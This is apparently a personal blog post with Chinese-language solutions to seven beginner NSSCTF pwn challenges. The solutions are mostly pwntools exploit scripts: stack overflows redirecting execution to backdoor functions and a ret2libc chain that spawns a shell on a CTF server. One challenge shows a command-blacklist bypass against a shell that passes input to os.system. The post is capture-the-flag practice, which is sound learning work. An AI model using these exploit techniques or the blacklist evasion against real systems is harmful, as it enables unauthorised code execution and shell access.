-
NSSCTF PWN (入门)
1 [SWPUCTF 2021 新生赛]nc签到
这不是欺负老实人嘛~
import os art = ''' (( "####@@!!$$ )) `#####@@!$$` )) (( '####@!!$: (( ,####@!!$: )) .###@!!$: `##@@!$: `#@!!$ !@# `#@!$: @#$ #$ `#@!$: !@! '@!$: '`\ "!$: /`' '\ '!: /' "\ : /" -."-/\\\-."//.-"/:`\."-.JrS"."-=_\\ " -."-.\\"-."//.-".`-."_\\-.".-\".-//''' print(art) print("My_shell_ProVersion") blacklist = ['cat','ls',' ','cd','echo','<','${IFS}'] while True: command = input() for i in blacklist: if i in command: exit(0) os.system(command)- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
tac$IFS$1flag
2 [SWPUCTF 2021 新生赛]gift_pwn已解决
ret2fun.
from pwn import * day3 = remote("1.14.71.254", 28339) # day3 = process("./ret2sys") gift = 0x4005B6 payload = b'a' * (0x10 + 8) + p64(gift) day3.sendline(payload) day3.interactive()- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
3 [CISCN 2019华北]PWN1
这里的覆盖是数值,这里是0x41348000。这玩意表示浮点数,有点疑惑。
from pwn import * day3 = remote("1.14.71.254", 28907) # day3 = process("./PWN1") payload = b'a' * (0x30 - 4) + p32(0x41348000) day3.recvuntil("Let's guess the number.\n") day3.sendline(payload) day3.interactive()- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
4 [SWPUCTF 2021 新生赛]whitegive_pwn
狗屎题目,没libc打不通。
from pwn import * from LibcSearcher import * io = remote('1.14.71.254', 28821) elf = ELF('./ret2libc') pop_rdi_ret = 0x0000000000400763 puts_plt = elf.plt['puts'] puts_got = elf.got['puts'] main = elf.symbols['main'] payload1 = b'a' * 24 + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main) io.sendline(payload1) puts_addr = u64(io.recv(6).ljust(8,b'\x00')) print(hex(puts_addr)) libc = LibcSearcher('puts', puts_addr) libc_base = puts_addr - libc.dump('puts') system = libc_base + libc.dump('system') bin_sh = libc_base + libc.dump('str_bin_sh') payload2 = b'a' * 24 + p64(pop_rdi_ret) + p64(bin_sh) + p64(system) io.sendline(payload2) io.interactive()- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
5 [BJDCTF 2020]babystack2.0已解决
from pwn import * day3 = remote("1.14.71.254",28058) # day3 = process("./pwn") day3.recvuntil("your name:\n") day3.sendline(b'-1') backdoor = 0x400726 payload = b'a' * 0x18 + p64(backdoor) day3.sendline(payload) day3.interactive()- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
6 [BJDCTF 2020]babystack
from pwn import * day3 = remote("1.14.71.254",28582) # day3 = process("./pwn") day3.recvuntil("your name:\n") day3.sendline(b'100') backdoor = 0x4006E6 payload = b'a' * 0x18 + p64(backdoor) day3.sendline(payload) day3.interactive()- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
7 [watevrCTF 2019]Voting Machine 1已解决
from pwn import * day3 = remote("1.14.71.254",28784) # day3 = process("./Voting Machine") day3.recvuntil("Vote: ") backdoor = 0x400807 payload = b'a' * (0x2 + 8) + p64(backdoor) day3.sendline(payload) day3.interactive()- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
又做了几道简单题。。
-
相关阅读:
流形上的预积分(中)
UE5 C++ 发射子弹发射(Projectile)
网络协议,数据传输,网络通讯
一些面试常问的数学概念
【数据结构】排序7——各种排序方法的比较
初级软件测试必问面试题
小白学Java
[Windows] 植物大战僵尸杂交版
[BDOI Round 1] 题解
Excel大量表格选择,快速定位表格
- 原文地址:https://blog.csdn.net/weixin_61823031/article/details/126917584
